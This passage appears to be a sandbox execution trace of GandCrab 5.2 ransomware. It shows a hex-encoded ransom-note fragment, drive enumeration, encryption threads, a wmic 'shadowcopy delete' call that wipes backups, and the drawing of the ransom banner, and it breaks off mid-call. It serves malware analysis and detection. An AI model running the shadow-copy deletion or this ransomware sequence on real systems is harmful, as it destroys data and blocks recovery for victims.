x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d" [0067.325] lstrcpyW (in: lpString1=0x230072a, lpString2="998a2f45d2ca4def" | out: lpString1="998a2f45d2ca4def") returned="998a2f45d2ca4def" [0067.325] lstrlenW (lpString="998a2f45d2ca4def") returned 16 [0067.325] lstrlenW (lpString="{V}") returned 3 [0067.325] lstrlenW (lpString="5.2") returned 3 [0067.325] lstrlenW (lpString="{EXTENSION}") returned 11 [0067.325] lstrlenW (lpString="TITWMVJL") returned 8 [0067.325] VirtualFree (lpAddress=0x1ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.325] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.325] VirtualFree (lpAddress=0x1e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.325] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0067.326] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x404153, lpParameter=0x1e70000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e8 [0067.326] GetSystemInfo (in: lpSystemInfo=0x19f978 | out: lpSystemInfo=0x19f978*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0067.326] VirtualAlloc (lpAddress=0x0, dwSize=0x1b, flAllocationType=0x3000, flProtect=0x4) returned 0x1e90000 [0067.326] GetDriveTypeA (lpRootPathName="A:\\") returned 0x1 [0067.326] GetDriveTypeA (lpRootPathName="B:\\") returned 0x1 [0067.327] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0067.327] GetDriveTypeA (lpRootPathName="D:\\") returned 0x1 [0067.327] GetDriveTypeA (lpRootPathName="E:\\") returned 0x1 [0067.327] GetDriveTypeA (lpRootPathName="F:\\") returned 0x1 [0067.327] GetDriveTypeA (lpRootPathName="G:\\") returned 0x1 [0067.327] GetDriveTypeA (lpRootPathName="H:\\") returned 0x1 [0067.327] GetDriveTypeA (lpRootPathName="I:\\") returned 0x1 [0067.328] GetDriveTypeA (lpRootPathName="J:\\") returned 0x1 [0067.328] GetDriveTypeA (lpRootPathName="K:\\") returned 0x1 [0067.328] GetDriveTypeA (lpRootPathName="L:\\") returned 0x1 [0067.328] GetDriveTypeA (lpRootPathName="M:\\") returned 0x1 [0067.328] GetDriveTypeA (lpRootPathName="N:\\") returned 0x1 [0067.328] GetDriveTypeA (lpRootPathName="O:\\") returned 0x1 [0067.328] GetDriveTypeA (lpRootPathName="P:\\") returned 0x1 [0067.328] GetDriveTypeA (lpRootPathName="Q:\\") returned 0x1 [0067.328] GetDriveTypeA (lpRootPathName="R:\\") returned 0x1 [0067.328] GetDriveTypeA (lpRootPathName="S:\\") returned 0x1 [0067.329] GetDriveTypeA (lpRootPathName="T:\\") returned 0x1 [0067.329] GetDriveTypeA (lpRootPathName="U:\\") returned 0x1 [0067.329] GetDriveTypeA (lpRootPathName="V:\\") returned 0x1 [0067.329] GetDriveTypeA (lpRootPathName="W:\\") returned 0x1 [0067.329] GetDriveTypeA (lpRootPathName="X:\\") returned 0x1 [0067.329] GetDriveTypeA (lpRootPathName="Y:\\") returned 0x1 [0067.329] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x1ea0000 [0067.329] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2450000 [0067.330] lstrcpyA (in: lpString1=0x2450000, lpString2="C:\\" | out: lpString1="C:\\") returned="C:\\" [0067.330] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x402219, lpParameter=0x2450000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ec [0067.330] WaitForMultipleObjects (nCount=0x1, lpHandles=0x1ea0000*=0x1ec, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0097.155] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0097.155] VirtualFree (lpAddress=0x1e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.155] VirtualFree (lpAddress=0x1ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.156] VirtualFree (lpAddress=0x1e40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.156] VirtualFree (lpAddress=0x1e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.156] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0097.156] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0097.156] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0097.156] VerifyVersionInfoW (in: lpVersionInformation=0x19f7c4, dwTypeMask=0x23, dwlConditionMask=0x1801b | out: lpVersionInformation=0x19f7c4) returned 1 [0097.156] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 0x1e40000 [0097.156] GetSystemDirectoryW (in: lpBuffer=0x1e40000, uSize=0x100 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0097.156] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\wbem\\wmic.exe" | out: lpString1="C:\\Windows\\system32\\wbem\\wmic.exe") returned="C:\\Windows\\system32\\wbem\\wmic.exe" [0097.156] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.156] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="C:\\Windows\\system32\\wbem\\wmic.exe", lpParameters="shadowcopy delete", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0099.023] VirtualFree (lpAddress=0x1e40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.024] GetCurrentProcess () returned 0xffffffff [0099.024] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fa28 | out: TokenHandle=0x19fa28*=0x354) returned 1 [0099.024] GetTokenInformation (in: TokenHandle=0x354, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19fa2c | out: TokenInformation=0x0, ReturnLength=0x19fa2c) returned 0 [0099.024] GetLastError () returned 0x7a [0099.024] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x4e5998 [0099.024] GetTokenInformation (in: TokenHandle=0x354, TokenInformationClass=0x19, TokenInformation=0x4e5998, TokenInformationLength=0x14, ReturnLength=0x19fa2c | out: TokenInformation=0x4e5998, ReturnLength=0x19fa2c) returned 1 [0099.024] GetSidSubAuthorityCount (pSid=0x4e59a0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x4e59a1 [0099.024] GetSidSubAuthority (pSid=0x4e59a0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x4e59a8 [0099.024] LocalFree (hMem=0x4e5998) returned 0x0 [0099.024] CloseHandle (hObject=0x354) returned 1 [0099.024] GetDC (hWnd=0x0) returned 0xa0100d0 [0099.024] CreateCompatibleDC (hdc=0xa0100d0) returned 0x47010631 [0099.024] GetDeviceCaps (hdc=0xa0100d0, index=8) returned 1440 [0099.024] GetDeviceCaps (hdc=0xa0100d0, index=10) returned 900 [0099.024] CreateCompatibleBitmap (hdc=0xa0100d0, cx=1440, cy=900) returned 0xffffffff94050559 [0099.066] SelectObject (hdc=0x47010631, h=0x94050559) returned 0x185000f [0099.066] GetDeviceCaps (hdc=0xa0100d0, index=90) returned 96 [0099.066] MulDiv (nNumber=18, nNumerator=96, nDenominator=72) returned 24 [0099.066] CreateFontW (cHeight=-24, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x1, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x4, iPitchAndFamily=0x0, pszFaceName=0x0) returned 0x9c0a052b [0099.066] SelectObject (hdc=0x47010631, h=0x9c0a052b) returned 0x18a0048 [0099.066] SetBkColor (hdc=0x47010631, color=0x0) returned 0xffffff [0099.066] SetTextColor (hdc=0x47010631, color=0xc8) returned 0x0 [0099.066] GetStockObject (i=2) returned 0x1900012 [0099.066] FillRect (hDC=0x47010631, lprc=0x19f9c4, hbr=0x1900012) returned 1 [0099.067] GetTickCount () returned 0x2ca5b [0100.553] lstrlenW (lpString="5.2") returned 3 [0100.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5.2", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0100.553] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e40000 [0100.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5.2", cchWideChar=3, lpMultiByteStr=0x1e40000, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5.2", lpUsedDefaultChar=0x0) returned 3 [0100.553] lstrlenA (lpString="5.2") returned 3 [0100.553] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e60000 [0100.554] wsprintfA (in: param_1=0x1e60000, param_2="ENCRYPTED BY GANDCRAB %s" | out: param_1="ENCRYPTED BY GANDCRAB 5.2") returned 25 [0100.554] DrawTextA (in: hdc=0x47010631, lpchText="ENCRYPTED BY GANDCRAB 5.2", cchText=-1, lprc=0x19f9c4, format=0x11 | out: lpchText="ENCRYPTED BY GANDCRAB 5.2", lprc=0x19f9c4) returned 29 [0100.580] VirtualFree (lpAddress=0x1e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.580] VirtualFree (lpAddress=0x1e40000, 